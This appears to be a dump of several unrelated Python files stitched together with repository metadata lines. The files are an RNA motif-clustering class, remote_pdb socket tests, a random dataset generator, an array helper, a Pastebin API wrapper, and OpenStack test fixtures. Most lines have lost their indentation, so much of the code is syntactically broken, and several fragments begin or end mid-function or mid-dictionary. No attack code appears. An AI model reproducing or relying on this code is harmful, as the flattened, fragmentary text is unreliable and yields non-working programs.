logger.debug('Clustering')
logger.debug('working on %d instances' % data_matrix.shape[0])
start_time = time.time()
self.clusterer.set_params(n_clusters=self.n_clusters)
if self.clusterer_is_fit:
preds = self.class_estimator.predict(data_matrix)
else:
preds = self.clusterer.fit_predict(data_matrix)
self.class_estimator.fit(data_matrix, preds)
self.clusterer_is_fit = True
dtime = time.time() - start_time
logger.debug('...done in %.2f secs' % (dtime))
self.clusters = defaultdict(list)
for pred, seq in zip(preds, subsequences):
self.clusters[pred].append(seq)
logger.debug('After clustering, %d motives' % len(self.clusters))
return self.clusters
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def score(self, seqs=None):
"""fit."""
try:
for score in multiprocess_score(seqs,
vectorizer=self.vectorizer,
estimator=self.estimator,
block_size=self.pos_block_size,
n_jobs=self.n_jobs):
yield score
except Exception as e:
logger.debug('Failed iteration. Reason: %s' % e)
logger.debug('Exception', exc_info=True)
def _order_clusters(self, clusters, complexity=3):
sep = ' ' * (complexity * 2)
        # join all sequences in a cluster with enough space that
        # kmers don't interfere
cluster_seqs = []
for cluster_id in clusters:
if len(clusters[cluster_id]) > 0:
seqs = [s for h, s in clusters[cluster_id]]
seq = sep.join(seqs)
cluster_seqs.append(seq)
# vectorize the seqs and compute their gram matrix K
cluster_vecs = Vectorizer(complexity).transform(cluster_seqs)
gram_matrix = metrics.pairwise.pairwise_kernels(
cluster_vecs, metric='linear')
c = linkage(gram_matrix, method='single')
orders = []
for id1, id2 in c[:, 0:2]:
if id1 < len(cluster_seqs):
orders.append(int(id1))
if id2 < len(cluster_seqs):
orders.append(int(id2))
return orders
def _compute_consensus_seq(self, align_seqs):
cluster = []
for h, align_seq in align_seqs:
str_list = [c for c in align_seq]
concat_str = np.array(str_list, dtype=np.dtype('a'))
cluster.append(concat_str)
cluster = np.vstack(cluster)
seq = ''
for i, row in enumerate(cluster.T):
c = Counter(row)
k = c.most_common()
seq += k[0][0]
return seq
def _compute_score(self, align_seqs, min_freq=0.8):
dim = len(align_seqs)
cluster = []
for h, align_seq in align_seqs:
str_list = [c for c in align_seq]
concat_str = np.array(str_list, dtype=np.dtype('a'))
cluster.append(concat_str)
cluster = np.vstack(cluster)
score = 0
to_be_removed = []
for i, row in enumerate(cluster.T):
c = Counter(row)
k = c.most_common()
if k[0][0] == '-':
to_be_removed.append(i)
val = k[1][1]
else:
val = k[0][1]
if float(val) / dim >= min_freq:
score += 1
trimmed_align_seqs = []
for h, align_seq in align_seqs:
trimmed_align_seq = [a for i, a in enumerate(align_seq)
if i not in to_be_removed]
trimmed_align_seqs.append((h, ''.join(trimmed_align_seq)))
return score, trimmed_align_seqs
def _is_high_quality(self,
seqs,
min_score=4,
min_freq=0.6,
min_cluster_size=10,
sample_size=200):
ma = MuscleAlignWrapper(alphabet='rna')
if len(seqs) > sample_size:
sample_seqs = random.sample(seqs, sample_size)
else:
sample_seqs = seqs
align_seqs = ma.transform(seqs=sample_seqs)
score, trimmed_align_seqs = self._compute_score(align_seqs,
min_freq=min_freq)
if score >= min_score and len(align_seqs) > min_cluster_size:
return True
else:
return False
def compute_motif(self,
seqs=None,
min_score=4,
min_freq=0.6,
min_cluster_size=10,
regex_th=.3,
sample_size=200):
"""compute_motif."""
ma = MuscleAlignWrapper(alphabet='rna')
if len(seqs) > sample_size:
sample_seqs = random.sample(seqs, sample_size)
else:
sample_seqs = seqs
align_seqs = ma.transform(seqs=sample_seqs)
score, trimmed_align_seqs = self._compute_score(align_seqs,
min_freq=min_freq)
if score >= min_score and len(align_seqs) > min_cluster_size:
consensus_seq = self._compute_consensus_seq(trimmed_align_seqs)
regex_seq = consensus_regex(trimmed_align_seqs, regex_th)
motif = {'consensus_seq': consensus_seq,
'regex_seq': regex_seq,
'trimmed_align_seqs': trimmed_align_seqs,
'align_seqs': align_seqs,
'seqs': seqs}
return True, motif
else:
return False, None
def compute_motives(self,
clusters,
min_score=4,
min_freq=0.6,
min_cluster_size=10,
regex_th=.3,
sample_size=200):
"""compute_motives."""
if not clusters:
raise Exception('Error: No clusters.')
mcs = min_cluster_size
logger.debug('Alignment')
motives = dict()
for cluster_id in clusters:
start_time = time.time()
# align with muscle
is_high_quality, motif = self.compute_motif(
seqs=clusters[cluster_id],
min_score=min_score,
min_freq=min_freq,
min_cluster_size=mcs,
regex_th=regex_th,
sample_size=sample_size)
if is_high_quality:
motives[cluster_id] = motif
dtime = time.time() - start_time
logger.debug(
'Cluster %d (#%d) (%.2f secs)' %
(cluster_id, len(clusters[cluster_id]), dtime))
logger.debug('After motives computation, %d motives' % len(motives))
return motives
def _identify_mergeable_clusters(self, motives, similarity_th=0.8):
for i in motives:
for j in motives:
if j > i:
seq_i = motives[i]['consensus_seq']
seq_j = motives[j]['consensus_seq']
nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1)
rel_nw_score = 2 * nw_score / (len(seq_i) + len(seq_j))
if rel_nw_score > similarity_th:
yield rel_nw_score, i, j
def merge(self,
motives,
similarity_th=0.5,
min_score=4,
min_freq=0.5,
min_cluster_size=10,
regex_th=.3,
sample_size=200):
"""merge."""
while True:
ms = sorted([m for m in self._identify_mergeable_clusters(
motives, similarity_th=similarity_th)], reverse=True)
success = False
for rel_nw_score, i, j in ms:
if motives.get(i, None) and motives.get(j, None):
n_i = len(motives[i]['seqs'])
n_j = len(motives[j]['seqs'])
seqs = motives[i]['seqs'] + motives[j]['seqs']
is_high_quality, motif = self.compute_motif(
seqs=seqs,
min_score=min_score,
min_freq=min_freq,
min_cluster_size=min_cluster_size,
regex_th=regex_th,
sample_size=sample_size)
if is_high_quality:
info1 = 'Joining: %d (#%d), %d (#%d) score: %.2f' % \
(i, n_i, j, n_j, rel_nw_score)
info2 = ' deleting: %d [%d is now #%d]' % \
(j, i, n_i + n_j)
logger.debug(info1 + info2)
# update motives
motives[i] = motif
del motives[j]
success = True
if success is False:
break
# TODO: run the predictor to learn the new class definition
logger.debug('After merge, %d motives' % len(motives))
return motives
def quality_filter(self,
seqs=None,
motives=None,
freq_th=None,
std_th=None):
"""quality_filter."""
_motives = dict()
for cluster_id in motives:
regex_seq = motives[cluster_id]['regex_seq']
counts, freq = occurrences(regex_seq, seqs)
motives[cluster_id]['freq'] = freq
motives[cluster_id]['counts'] = counts
avg, std = extract_location(regex_seq, seqs)
motives[cluster_id]['avg_pos'] = avg
motives[cluster_id]['std_pos'] = std
if freq_th is None or freq >= freq_th:
if std_th is None or std <= std_th:
_motives[cluster_id] = motives[cluster_id]
if len(_motives) == 0:
logger.warning('Quality filter is too strict. Ignoring filter.')
return motives
else:
logger.debug('After quality filter, %d motives' % len(_motives))
return _motives
def select_motives(self,
seqs=None,
p_value=0.05,
similarity_th=0.5,
min_score=4,
min_freq=0.5,
min_cluster_size=10,
regex_th=.3,
sample_size=200,
freq_th=None,
std_th=None):
"""select_motives."""
orig_clusters = self.compute_clusters(seqs, p_value=p_value)
motives = self.compute_motives(
orig_clusters,
min_score=min_score,
min_freq=min_freq,
min_cluster_size=min_cluster_size,
regex_th=regex_th,
sample_size=sample_size)
motives = self.merge(
motives,
similarity_th=similarity_th,
min_score=min_score,
min_freq=min_freq,
min_cluster_size=min_cluster_size,
regex_th=regex_th,
sample_size=sample_size)
motives = self.quality_filter(
seqs,
motives,
freq_th=freq_th,
std_th=std_th)
return motives
def compute_logo(self,
cluster_id=None,
motif=None):
"""compute_logo."""
alphabet = 'rna'
color_scheme = 'classic'
wb = Weblogo(output_format='png',
sequence_type=alphabet,
resolution=200,
stacks_per_line=60,
units='bits',
color_scheme=color_scheme)
logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs'])
logo_txt = []
info = ' - num subarrays: %d' % len(motif['seqs'])
logo_txt.append(info)
info = ' - consensus sequence: %s' % motif['consensus_seq']
logo_txt.append(info)
info = ' - consensus regex: %s' % motif['regex_seq']
logo_txt.append(info)
return logo_image, logo_txt
def compute_logos(self,
motives,
ids=None):
"""compute_logos."""
if motives:
if ids is None:
ids = [cluster_id for cluster_id in motives]
logos = dict()
for cluster_id in ids:
logo_image, logo_txt = self.compute_logo(
cluster_id=cluster_id,
motif=motives[cluster_id])
logos[cluster_id] = (logo_image, logo_txt)
return logos
else:
logger.warning(
'No logo to compute. Try more permissive parameters.')
def _save_logo(self, logo, cluster_id, fname):
imagename = '%s_logo_cl_%d.png' % (fname, cluster_id)
with open(imagename, 'wb') as f:
f.write(logo)
return imagename
def _wrap_image(self, fname, fill_width=True, output_type='screen'):
pwd = os.getcwd()
url = pwd + '/' + fname
txt = []
if fill_width:
if output_type == 'pdf':
txt.append('<p align="left"><img src="file://' + url +
'" style="width: 100%"></p>')
else:
txt.append('<p align="left"><img src="' + fname +
'" style="width: 100%"></p>')
else:
if output_type == 'pdf':
txt.append('<p align="left"><img src="file://' + url +
'"></p>')
else:
txt.append('<p align="left"><img src="' + fname +
'"></p>')
return '\n'.join(txt)
def report(self,
pos_seqs,
all_seqs,
motives,
nbins=40,
size=(17, 2),
output_type='screen',
fname=None):
"""Report in markdown format."""
txt = []
if motives:
_, norm_cooccurence_mtx, distances = compute_cooccurence(motives)
info = '### Summary: %d motives' % len(motives)
txt.append(info)
figname = plot_cumulative_score(
self, pos_seqs, size=size, fname=fname)
txt.append(self._wrap_image(figname, output_type=output_type))
for freq, cluster_id in sorted([(motives[i]['freq'], i)
for i in motives], reverse=True):
info = ' - %.2s %s' % \
(cluster_id, motives[cluster_id]['consensus_seq'])
txt.append(info)
for freq, cluster_id in sorted([(motives[i]['freq'], i)
for i in motives], reverse=True):
info = '#### Motif id: %d' % cluster_id
txt.append(info)
logo_image, logo_txts = self.compute_logo(
cluster_id, motif=motives[cluster_id])
figname = self._save_logo(logo_image, cluster_id, fname)
for logo_txt in logo_txts:
txt.append(logo_txt)
co = motives[cluster_id]['counts']
fr = motives[cluster_id]['freq']
info = ' - num occurrences of regex: %d' % (co)
txt.append(info)
info = ' - freq of occurrences of regex: %.2f' % (fr)
txt.append(info)
av = motives[cluster_id]['avg_pos']
st = motives[cluster_id]['std_pos']
info = ' - average location: %.1f +- %.1f' % (av, st)
txt.append(info)
txt.append(self._wrap_image(figname,
fill_width=False,
output_type=output_type))
regex_i = motives[cluster_id]['regex_seq']
figname = plot_location(
regex_i, all_seqs, cluster_id=cluster_id,
nbins=nbins, size=size, fname=fname)
txt.append(self._wrap_image(figname, output_type=output_type))
for j in motives:
                    regex_i = motives[cluster_id]['regex_seq']
if j != cluster_id:
regex_j = motives[j]['regex_seq']
ds = distances[(cluster_id, j)]
info = ' - num co-occurences %d %s vs %d %s: %d' % \
(cluster_id, regex_i, j, regex_j, len(ds))
txt.append(info)
if len(ds):
figname = plot_distance(
cluster_id, j,
regex_i, regex_j,
distances,
nbins=nbins, size=size, fname=fname)
txt.append(self._wrap_image(
figname,
output_type=output_type))
txt.append('_' * 100)
else:
logger.warning(
'No motives to report. Try more permissive parameters.')
txt = '\n'.join(txt)
return txt
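# Illustrative usage sketch (added for clarity; not part of the original
# module and never invoked). `pos_seqs`, `neg_seqs` and `all_seqs` are
# assumed to be lists of (header, sequence) tuples prepared by the caller;
# only methods defined above are used.
def _example_smd_workflow(pos_seqs, neg_seqs, all_seqs):
    smd = SequenceMotifDecomposer(complexity=5, n_clusters=10)
    smd.fit(pos_seqs=pos_seqs, neg_seqs=neg_seqs)
    motives = smd.select_motives(seqs=pos_seqs, p_value=0.05)
    return smd.report(pos_seqs, all_seqs, motives, fname='motif_report')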
| 2.109375 | 2 |
tests/test_remote_pdb.py | MatthewWilkes/python-remote-pdb | 0 | 12794292 | from __future__ import print_function
import logging
import os
import re
import socket
import sys
import time
from process_tests import TestProcess
from process_tests import TestSocket
from process_tests import dump_on_error
from process_tests import wait_for_strings
from remote_pdb import set_trace
TIMEOUT = int(os.getenv('REMOTE_PDB_TEST_TIMEOUT', 10))
def test_simple():
with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:
with dump_on_error(proc.read):
wait_for_strings(proc.read, TIMEOUT,
'{a1}',
'{b1}',
'RemotePdb session open at ')
host, port = re.findall("RemotePdb session open at (.+):(.+),", proc.read())[0]
with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:
with dump_on_error(client.read):
wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')
wait_for_strings(client.read, TIMEOUT, "-> print('{b2}')")
client.fh.write(b'quit\r\n')
wait_for_strings(proc.read, TIMEOUT, 'DIED.')
def test_redirect():
with TestProcess(sys.executable, __file__, 'daemon', 'test_redirect') as proc:
with dump_on_error(proc.read):
wait_for_strings(proc.read, TIMEOUT,
'{a1}',
'{b1}',
'RemotePdb session open at ')
host, port = re.findall("RemotePdb session open at (.+):(.+),", proc.read())[0]
with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:
with dump_on_error(client.read):
wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')
wait_for_strings(client.read, TIMEOUT, "-> print('{b2}')")
client.fh.write(b'break func_a\r\n')
client.fh.write(b'continue\r\n')
wait_for_strings(client.read, TIMEOUT, 'Breakpoint', '{b2}')
wait_for_strings(client.read, TIMEOUT, "-> print('{a2}')")
client.fh.write(b'continue\r\n')
wait_for_strings(client.read, TIMEOUT, "{=>")
wait_for_strings(proc.read, TIMEOUT, 'DIED.')
assert 'Restoring streams' not in proc.read()
def test_simple_break():
with TestProcess(sys.executable, __file__, 'daemon', 'test_simple') as proc:
with dump_on_error(proc.read):
wait_for_strings(proc.read, TIMEOUT,
'{a1}',
'{b1}',
'RemotePdb session open at ')
host, port = re.findall("RemotePdb session open at (.+):(.+),", proc.read())[0]
with TestSocket(socket.create_connection((host, int(port)), timeout=TIMEOUT)) as client:
with dump_on_error(client.read):
wait_for_strings(proc.read, TIMEOUT, 'accepted connection from')
wait_for_strings(client.read, TIMEOUT, "-> print('{b2}')")
client.fh.write(b'break func_a\r\n')
client.fh.write(b'continue\r\n')
wait_for_strings(client.read, TIMEOUT, "-> print('{a2}')")
client.fh.write(b'continue\r\n')
wait_for_strings(proc.read, TIMEOUT, 'DIED.')
assert 'Restoring streams' not in proc.read()
def func_b(patch_stdstreams):
print('{b1}')
set_trace(patch_stdstreams=patch_stdstreams)
print('{b2}')
def func_a(block=lambda _: None, patch_stdstreams=False):
print('{a1}')
func_b(patch_stdstreams)
print('{a2}')
x = block('{a3} ?')
print('{=> %s}' % x)
if __name__ == '__main__':
logging.basicConfig(
level=logging.DEBUG,
format='%(process)d %(asctime)s,%(msecs)05d %(name)s %(levelname)s %(message)s',
datefmt="%x~%X"
)
test_name = sys.argv[2]
if test_name == 'test_simple':
func_a()
elif test_name == 'test_redirect':
func_a(patch_stdstreams=True)
time.sleep(TIMEOUT)
else:
raise RuntimeError('Invalid test spec %r.' % test_name)
logging.info('DIED.')
| 2.21875 | 2 |
src/web_api/routers/__init__.py | poyang31/hw_2021_12 | 3 | 12794293 | <gh_stars>1-10
from ...kernel import Config, Database
config = Config()
database = Database(config)
articles_collection = database.get_collection("articles")
results_collection = database.get_collection("results")
| 1.523438 | 2 |
test/gends.py | jlinoff/cmpds | 0 | 12794294 | <reponame>jlinoff/cmpds<gh_stars>0
#!/usr/bin/env python
'''
Generate random floating point numbers in a range for testing.
It is used to create datasets to test cmpds.
You can decorate the datasets with a header and record counts to
make them easier to read. That works because cmpds allows you
to specify which column to read in the dataset file.
Typically you would want to generate at least 50 elements to enable
the use of the standard normal distribution (SND) for analysis.
'''
# License: MIT Open Source
# Copyright (c) 2016 by <NAME>
import argparse
import datetime
import inspect
import os
import random
import sys
VERSION = '0.1'
def generate_dataset(n, lower, upper):
'''
    Generate a dataset of n elements in the range [lower..upper].
A typical call might be something like:
n = 50
lower = 98
upper = 101
'''
for i in range(n):
r = random.uniform(lower, upper)
yield r
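# Illustrative sketch (added for clarity; never called): the generator above
# can also be driven directly from Python, mirroring the "typical call"
# values mentioned in its docstring.
def _example_generate_dataset():
    for value in generate_dataset(50, 98, 101):
        print('{:.3f}'.format(value))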
def info(msg, f=1):
'''
Write an info message to stdout.
'''
lineno = inspect.stack()[f][2]
print('INFO:{} {}'.format(lineno, msg))
def warn(msg, f=1):
'''
Write a warning message to stdout.
'''
lineno = inspect.stack()[f][2]
print('WARNING:{} {}'.format(lineno, msg))
def err(msg, f=1):
'''
Write an error message to stderr and exit.
'''
lineno = inspect.stack()[f][2]
sys.stderr.write('ERROR:{} {}\n'.format(lineno, msg))
sys.exit(1)
def getopts():
'''
Get the command line options using argparse.
'''
# Trick to capitalize the built-in headers.
# Unfortunately I can't get rid of the ":" reliably.
def gettext(s):
lookup = {
'usage: ': 'USAGE:',
'optional arguments': 'OPTIONAL ARGUMENTS',
'show this help message and exit': 'Show this help message and exit.\n ',
}
return lookup.get(s, s)
argparse._ = gettext # to capitalize help headers
base = os.path.basename(sys.argv[0])
name = os.path.splitext(base)[0]
usage = '\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base)
desc = 'DESCRIPTION:{0}'.format('\n '.join(__doc__.split('\n')))
epilog = r'''
EXAMPLES:
# Example 1: help
$ {0} -h
# Example 2: generate a dataset that mocks runtimes between
# 115 and 125 seconds per run.
# Typically you would want to generate at least 50
# elements to enable the use of the SND for analysis.
$ {0} 8 115 125
124.409
121.153
116.976
115.358
123.128
121.975
124.312
122.044
# Example 3: generate a dataset that mocks runtimes between
# 115 and 125 seconds per run and is decorated.
# Typically you would want to generate at least 50
# elements to enable the use of the SND for analysis.
$ {0} -D 8 115 125
# date = 2016-11-24 08:27:49.668509
# num = 8
# lower = 115.000
# upper = 125.000
# decimal places = 3
1 116.212
2 122.327
3 118.571
4 120.238
5 124.852
6 119.652
7 116.400
8 122.446
# Example 4: generate a dataset that mocks runtimes between
# 10 and 12 seconds with 2 decimal digits of precision.
# Typically you would want to generate at least 50
# elements to enable the use of the SND for analysis.
$ {0} -D -d 2 6 10 12
# date = 2016-11-24 08:30:31.039108
# num = 6
# lower = 10.000
# upper = 12.000
# decimal places = 2
1 10.30
2 11.48
3 10.50
4 10.25
5 10.52
6 11.34
'''.format(base)
afc = argparse.RawTextHelpFormatter
parser = argparse.ArgumentParser(formatter_class=afc,
description=desc[:-2],
usage=usage,
epilog=epilog)
parser.add_argument('-d', '--decimal-places',
action='store',
type=int,
metavar=('NUMBER'),
default=3,
help='''The number of decimal places.
The default is %(default)s.
''')
parser.add_argument('-D', '--decorate',
action='store_true',
help='''Print header and line numbers.
''')
parser.add_argument('-v', '--verbose',
action='count',
help='''Increase the level of verbosity.
''')
parser.add_argument('-V', '--version',
action='version',
version='%(prog)s v{0}'.format(VERSION),
help="""Show program's version number and exit.
""")
# Positional arguments at the end.
parser.add_argument('num',
nargs=1,
action='store',
type=int,
help='''The number of elements in the dataset.
''')
parser.add_argument('lower',
nargs=1,
action='store',
type=float,
help='''The lower bound.
''')
parser.add_argument('upper',
nargs=1,
action='store',
type=float,
help='''The upper bound.
''')
opts = parser.parse_args()
return opts
def main():
'''
Main entry point.
'''
opts = getopts()
num = opts.num[0]
lower = opts.lower[0]
upper = opts.upper[0]
if lower > upper:
err('lower bound {} must be less than upper bound {}'.format(lower, upper))
if opts.decorate:
print('# date = {}'.format(datetime.datetime.now()))
print('# num = {}'.format(num))
print('# lower = {:.3f}'.format(lower))
print('# upper = {:.3f}'.format(upper))
print('# decimal places = {}'.format(opts.decimal_places))
i = 0
for r in generate_dataset(num, lower, upper):
if opts.decorate:
i += 1
f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places)
print(f.format(i, r))
else:
f = '{{:>10.{}f}}'.format(opts.decimal_places)
print(f.format(r))
if __name__ == '__main__':
main()
| 3.734375 | 4 |
prep_and_learning/python/arrays/arrayops.py | adityaka/misc_scripts | 1 | 12794295 | from typing import List
class ArrayOps(object):
def __init__(self, input_array:List[int] ):
self._input = input_array
def _validate_index(self, index):
        assert index < len(self._input), "Index can't be greater than length"
def remove_at(self, index):
self._validate_index(index)
i = index
length = len(self._input)
while i+1 < length:
self._input[i] = self._input[i+1]
i+=1
self._input.pop(len(self._input)-1)
    def insert_at(self, index, data):
        self._validate_index(index)
        self._input.insert(index, data)
    def remove_duplicates(self):
        dup_map = dict()
        i = 0
        while i < len(self._input):
            if self._input[i] in dup_map:
                del self._input[i]
            else:
                dup_map[self._input[i]] = i
                i += 1
    def find_duplicates(self):
        dup_map = dict()
        for value in self._input:
            if value in dup_map:
                dup_map[value] += 1
            else:
                dup_map[value] = 1
        return [value for value, count in dup_map.items() if count > 1]
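# Illustrative sketch (added for clarity; never called): basic ArrayOps usage.
def _example_arrayops():
    ops = ArrayOps([3, 1, 4, 1, 5, 9, 2, 6, 5])
    print(ops.find_duplicates())  # values that occur more than once
    ops.remove_duplicates()       # de-duplicate in place
    ops.remove_at(0)              # drop the first element
    ops.insert_at(0, 7)           # put 7 back at the front
    print(ops._input)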
| 3.671875 | 4 |
pastebin.py | Optixal/pastebin-wrapper | 1 | 12794296 | #!/usr/bin/python3
# Light Pastebin Wrapper
# By Optixal
# Pastebin Documentation: https://pastebin.com/api
import requests, os
# Precedence of Confidential Information:
# Environment Variable > Function Argument > Constant Defined Here
# Recommended: Set confidential information as environment variables with "export PASTEBIN_DEV_KEY=abc123". You can store the "export" commands within a file named "keys" as well and run "source keys".
PASTEBIN_DEV_KEY = ''
PASTEBIN_USER_NAME = ''
PASTEBIN_USER_PASSWORD = ''
# Pastes code/text anonymously to Pastebin
# Returns: paste_url, the URL containing the paste
def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'):
data = {
'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key),
'api_user_key' : user_key,
'api_option' : option,
'api_paste_private' : str(paste_private),
'api_paste_name' : paste_name,
'api_paste_expire_date' : paste_expire_date,
'api_paste_format' : paste_format,
'api_paste_code' : paste_code,
}
url = 'https://pastebin.com/api/api_post.php'
r = requests.post(url, data=data)
if r.status_code == 200 and 'Bad' not in r.text: return r.text
else: raise PasteError(r.text)
class PasteError(Exception):
def __init__(self, response):
self.response = response
def __str__(self):
return repr(self.response)
# Authenticate with Pastebin with username and password
# Returns: user_key, a session key used when pasting a non-guest paste
def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=PASTEBIN_USER_PASSWORD):
data = {
'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key),
'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name),
'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password),
}
url = 'https://pastebin.com/api/api_login.php'
r = requests.post(url, data=data)
if r.status_code == 200 and 'Bad' not in r.text: return r.text
else: raise LoginError(r.text)
class LoginError(Exception):
def __init__(self, response):
self.response = response
def __str__(self):
return repr(self.response)
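# Illustrative usage sketch (added for clarity; never executed on import).
# It assumes PASTEBIN_DEV_KEY (and, for login, PASTEBIN_USER_NAME and
# PASTEBIN_USER_PASSWORD) are available via environment variables or the
# constants above; expiry/privacy/format values follow the Pastebin API
# documentation linked at the top of this file.
def _example_paste():
    # Guest paste, expires in 10 minutes, highlighted as Python.
    print(paste('print("hello world")', paste_expire_date='10M', paste_format='python'))
    # Private paste tied to the authenticated account.
    user_key = login()
    print(paste('my notes', user_key=user_key, paste_private=2))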
| 2.21875 | 2 |
ospurge/tests/client_fixtures.py | esracelik/ospurge | 0 | 12794297 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright © 2014 Cloudwatt
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
TOKEN_ID = '<KEY>'
USER_ID = '<PASSWORD>'
PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58'
AUTH_URL = "http://localhost:5000/v2.0"
ROLE_URL = "http://admin:35357/v2.0/OS-KSADM"
VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58'
IMAGE_PUBLIC_ENDPOINT = 'http://public:9292'
STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8'
NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net'
COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5'
METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net'
ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1'
VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58'
IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292'
STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8'
NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696'
COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5'
METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777'
ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1'
AUTH_URL_RESPONSE = {
u'version': {
u'id': u'v2.0',
u'links': [
{u'href': u'%s' % AUTH_URL, u'rel': u'self'},
{u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/',
u'rel': u'describedby',
u'type': u'text/html'},
{u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf',
u'rel': u'describedby',
u'type': u'application/pdf'}
],
u'media-types': [
{u'base': u'application/json',
u'type': u'application/vnd.openstack.identity-v2.0+json'},
{u'base': u'application/xml',
u'type': u'application/vnd.openstack.identity-v2.0+xml'}
],
u'status': u'stable',
u'updated': u'2014-04-17T00:00:00Z'
}
}
STORAGE_CONTAINERS = ['janeausten', 'marktwain']
STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'},
{'container': 'janeausten', 'name': 'bar'},
{'container': 'marktwain', 'name': 'hello world'}]
VOLUMES_IDS = ["45baf976-c20a-4894-a7c3-c94b7376bf55",
"5aa119a8-d25b-45a7-8d1b-88e127885635"]
SNAPSHOTS_IDS = ["3fbbcccf-d058-4502-8844-6feeffdf4cb5",
"e479997c-650b-40a4-9dfe-77655818b0d2"]
VOLUME_BACKUP_IDS = ["803a2ad2-893b-4b42-90d9-eb5f09a8421a"]
ROUTERS_IDS = ["7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b",
"a9254bdb-2613-4a13-ac4c-adc581fba50d"]
PORTS_IDS = ["d7815f5b-a228-47bb-a5e5-f139c4e476f6"]
NETWORKS_IDS = ["9d83c053-b0a4-4682-ae80-c00df269ce0a",
"ebda9658-093b-41ba-80ce-0cf8cb8365d4"]
SECGROUPS_IDS = ["85cc3048-abc3-43cc-89b3-377341426ac5"]
FLOATING_IPS_IDS = ["2f245a7b-796b-4f26-9cf9-9e82d248fda7",
"61cea855-49cb-4846-997d-801b70c71bdd"]
SERVERS_IDS = ["616fb98f-46ca-475e-917e-2563e5a8cd19"]
IMAGES_IDS = ["37717f53-3707-49b9-9dd0-fd063e6b9fc5", "4e150966-cbe7-4fd7-a964-41e008d20f10",
"482fbcc3-d831-411d-a073-ddc828a7a9ed"]
ALARMS_IDS = ["ca950223-e982-4552-9dec-5dc5d3ea4172"]
STACKS_IDS = ["5c136348-5550-4ec5-8bd6-b83241844db3",
"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9"]
UNBOUND_PORT_ID = "abcdb45e-45fe-4e04-8704-bf6f58760000"
PRIVATE_PORT_IDS = ["p7815f5b-a228-47bb-a5e5-f139c4f476ft", "p78o5f5t-a228-47bb-a5e2-f139c4f476ft"]
FIREWALL_RULE_IDS = ["firebcc3-d831-411d-a073-ddc828a7a9id",
"fi7815f5b-a328-47cb-a5e5-f139c4e476f7"]
FIREWALL_POLICY_IDS = ["firebcc3-d831-422d-a073-ccc818a7a9id", "poa119a8-d25b-45a7-8d1b-88e127885630"]
FIREWALL_IDS = ["firewal1-d831-422d-a073-ckc818a7a9ab", "firewa1l-d831-422d-a073-ckc818a7a9ab"]
METERING_LABEL_IDS = ["mbcdb45e-45fe-4e04-8704-bf6f58760011", "meteb45e-45fe-4e04-8704-bf6f58760000"]
LBAAS_MEMBER_IDS = ["37717f53-3707-49b9-9dd0-fd063e6lbass", "la650123-e982-4552-9dec-5dc5d3ea4172"]
LBAAS_VIP_IDS = ["616fb98f-36ca-475e-917e-1563e5a8cd10", "102fbcc3-d831-411d-a333-ddc828a7a9ed"]
LBAAS_HEALTHMONITOR_IDS = ["he717f53-3707-49b9-9dd0-fd063e6lbass"]
LBAAS_POOL_IDS = ["lb815f5b-a228-17bb-a5e5-f139c3e476f6", "dlb15f5b-a228-47bb-a5e5-f139c4e47po6"]
# Simulating JSON sent from the Server
PROJECT_SCOPED_TOKEN = {
'access': {
'serviceCatalog':
[{
'endpoints': [{
'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58',
'internalURL': VOLUME_INTERNAL_ENDPOINT,
'publicURL': VOLUME_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Volume Service',
'type': 'volume'
}, {
'endpoints': [{
